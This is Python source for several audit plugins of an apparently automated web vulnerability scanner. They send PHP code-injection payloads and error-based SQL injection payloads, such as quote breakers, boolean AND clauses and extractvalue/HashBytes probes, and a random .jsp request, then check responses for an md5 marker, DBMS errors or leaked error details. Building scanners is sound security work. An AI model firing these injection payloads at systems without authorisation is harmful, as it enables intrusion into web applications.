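def audit(self):
    """Probe every injectable parameter for PHP code injection.

    The check is skipped unless the response was fingerprinted as PHP or the
    configured scan level is at least 2. For each position/payload pair the
    response is inspected for three things:

      * the md5 marker echoed back (reported under ``self.desc`` as
        ``VulType.CMD_INNJECTION``);
      * a PHP ``Parse error`` (same type; the detail text notes that this is
        probably an unclosed statement rather than execution);
      * sensitive error details found by ``sensitive_page_error_message_check``
        (reported once, as ``VulType.SENSITIVE``, after all positions ran).

    The first two findings stop the remaining payloads for that position; the
    leak finding is attached to the response that actually produced it.
    """
    if WEB_PLATFORM.PHP not in self.response.programing and conf.level < 2:
        return
    # Raw string: "\s" inside a plain literal is an invalid escape sequence.
    regx = r'Parse error: syntax error,.*?\sin\s'
    randint = random.randint(5120, 10240)
    verify_result = md5(str(randint).encode())
    # NOTE(review): the "{}" placeholders are not substituted in this method;
    # presumably paramsCombination() fills them in — confirm, because otherwise
    # verify_result can never appear in a response.
    _payloads = [
        "print(md5({}));",
        ";print(md5({}));",
        "';print(md5({}));$a='",
        "\";print(md5({}));$a=\"",
        "${{@print(md5({}))}}",
        "${{@print(md5({}))}}\\",
        "'.print(md5({})).'",
    ]
    # Load the injection positions together with their original parameters.
    iterdatas = self.generateItemdatas()
    # First sensitive-error leak seen: (key, value, response, position, matches).
    # Kept as one tuple so the report below uses the response that leaked,
    # not whichever request happened to run last.
    leak = None
    # Combine original parameters and positions into the concrete payloads.
    for origin_dict, positon in iterdatas:
        payloads = self.paramsCombination(origin_dict, positon, _payloads)
        for key, value, new_value, payload in payloads:
            r = self.req(positon, payload)
            if not r:
                continue
            html1 = r.text
            if verify_result in html1:
                result = self.new_result()
                result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "探测payload:{}并发现回显:{}".format(new_value, verify_result),
                    key, value, positon)
                self.success(result)
                break  # remaining payloads for this position are moot
            if re.search(regx, html1, re.I | re.S | re.M):
                result = self.new_result()
                result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "探测payload:{}并发现正则回显:{},可能是payload未闭合语句造成的错误".format(new_value, regx),
                    key, value, positon)
                self.success(result)
                break
            # Only the first leak is recorded; later responses are not re-checked.
            if leak is None:
                errors = sensitive_page_error_message_check(html1)
                if errors:
                    leak = (key, value, r, positon, errors)
    if leak is None:
        return
    key, value, r, positon, errors = leak
    result = self.new_result()
    result.init_info(self.requests.url, "敏感配置信息泄漏", VulType.SENSITIVE)
    for m in errors:
        result.add_detail(
            "payload请求", r.reqinfo, generateResponse(r),
            "匹配组件:{} 匹配正则:{}".format(m["type"], m["text"]),
            key, value, positon)
    self.success(result)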
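def audit(self):
    """Error-based SQL injection probe.

    Each injectable parameter receives a set of quote / comment / boolean
    payloads. The first response matching one of the DBMS error patterns from
    ``Get_sql_errors()`` is reported as ``VulType.SQLI`` and the scan stops;
    failing that, a response that contains other sensitive error text (per
    ``sensitive_page_error_message_check``) is reported the same way.

    Returns:
        True once a finding has been reported, otherwise None.
    """
    num = random_num(4)
    s = random_str(4)
    _payloads = [
        # "\\(" keeps the literal backslash; a bare "\(" is an invalid escape.
        '鎈\'"\\(',
        "'", "')", "';", '"', '")', '";',
        ' order By 500 ',
        "--", "-0",
        ") AND {}={} AND ({}={}".format(num, num + 1, num, num),
        " AND {}={}%23".format(num, num + 1),
        " %' AND {}={} AND '%'='".format(num, num + 1),
        " ') AND {}={} AND ('{}'='{}".format(num, num + 1, s, s),
        " ' AND {}={} AND '{}'='{}".format(num, num + 1, s, s),
        '`', '`)', '`;', '\\',
        "%27", "%%2727", "%25%27", "%60", "%5C",
        # Use the generated value; the original passed the random_num
        # function object itself to format(), which rendered its repr.
        "extractvalue(1,concat(char(126),md5({})))".format(num),
        "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".format(num),
    ]
    # Load the injection positions together with their original parameters.
    iterdatas = self.generateItemdatas()
    # Combine original parameters and positions into the concrete payloads.
    for origin_dict, positon in iterdatas:
        payloads = self.paramsCombination(origin_dict, positon, _payloads)
        for key, value, new_value, payload in payloads:
            r = self.req(positon, payload)
            if not r:
                continue
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if not match:
                    continue
                result = self.new_result()
                result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "DBMS_TYPE:{} 匹配结果:{}".format(dbms_type, match.group()),
                    key, payload, positon)
                self.success(result)
                return True
            message_lists = sensitive_page_error_message_check(html)
            if message_lists:
                result = self.new_result()
                result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "需要注意的报错信息:{}".format(repr(message_lists)),
                    key, payload, positon)
                self.success(result)
                return True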
def audit(self):
    """Fetch a random, non-existent ``.jsp`` path on the scanned host and report
    sensitive details found in the resulting error page.

    The probe reuses the scanned request's headers. Any match returned by
    ``sensitive_page_error_message_check`` is recorded against the original
    URL as ``VulType.SENSITIVE`` with an empty key/value and ``PLACE.GET``.
    """
    parsed = urlparse(self.requests.url)
    origin = "{}://{}/".format(parsed.scheme, parsed.netloc)
    # A random resource name so the server has to render its error page.
    probe_url = origin + random_str(6) + ".jsp"
    # NOTE(review): no timeout is passed here — confirm the project patches
    # one in, otherwise a stalled host blocks the scan indefinitely.
    r = requests.get(probe_url, headers=self.requests.headers)
    messages = sensitive_page_error_message_check(r.text)
    if not messages:
        return
    result = self.new_result()
    result.init_info(self.requests.url, "敏感的报错信息", VulType.SENSITIVE)
    for m in messages:
        result.add_detail(
            "payload请求", r.reqinfo, generateResponse(r),
            "匹配组件:{} 匹配正则:{}".format(m["type"], m["text"]),
            "", "", PLACE.GET)
    self.success(result)
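def audit(self):
    """Single-payload error-based SQL injection probe.

    Every injectable parameter is sent one quote-breaking payload. A response
    matching a DBMS error pattern from ``Get_sql_errors()`` is reported as
    ``VulType.SQLI`` ("SQL注入"); otherwise, sensitive error text found by
    ``sensitive_page_error_message_check`` is reported as "基于报错的SQL注入".

    Returns:
        True once a finding has been reported, otherwise None.
    """
    # "\\(" keeps the literal backslash; a bare "\(" is an invalid escape.
    _payloads = ['鎈\'"\\(']
    # Load the injection positions together with their original parameters.
    iterdatas = self.generateItemdatas()
    # Combine original parameters and positions into the concrete payloads.
    for origin_dict, positon in iterdatas:
        payloads = self.paramsCombination(origin_dict, positon, _payloads)
        for key, value, new_value, payload in payloads:
            r = self.req(positon, payload)
            if not r:
                continue
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if not match:
                    continue
                result = self.new_result()
                result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "DBMS_TYPE:{} 匹配结果:{}".format(dbms_type, match.group()),
                    key, payload, positon)
                self.success(result)
                return True
            message_lists = sensitive_page_error_message_check(html)
            if message_lists:
                result = self.new_result()
                result.init_info(self.requests.url, "基于报错的SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "需要注意的报错信息:{}".format(repr(message_lists)),
                    key, payload, positon)
                self.success(result)
                return True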